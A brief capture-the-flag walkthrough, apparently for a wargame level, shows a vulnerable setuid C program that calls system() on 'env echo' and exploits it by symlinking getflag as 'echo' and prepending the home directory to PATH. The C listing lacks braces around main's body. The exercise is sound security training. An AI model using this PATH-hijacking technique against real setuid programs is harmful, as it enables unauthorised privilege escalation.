In Level01 , we are given the following vulnerable c program:

#include <stdlib.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
 gid_t gid;
 uid_t uid;
 gid = getegid();
 uid = geteuid();

 setresgid(gid, gid, gid);
 setresuid(uid, uid, uid);

 system("/usr/bin/env echo and now what?");

This is the code of the /home/flag01/flag01 program that runs as flag01 user

[email protected]:~$ ls -la /home/flag01/flag01
-rwsr-x--- 1 flag01 level01 7322 Nov 20  2011 /home/flag01/flag01

As setresuid sets the Real, Effective and Saved uids to the effective one (flag01), the following call to system will effectively run as flag01. We just a need to run the getflag program instead. In order to do that, we will create a symbolic link to getflag in our home diretory and call it echo. Now we only need to modify the PATH environment variable.

[email protected]:~$ ln -s /bin/getflag echo
[email protected]:~$ export PATH=/home/level01:$PATH
[email protected]:~$ /home/flag01/flag01
You have successfully executed getflag on a target account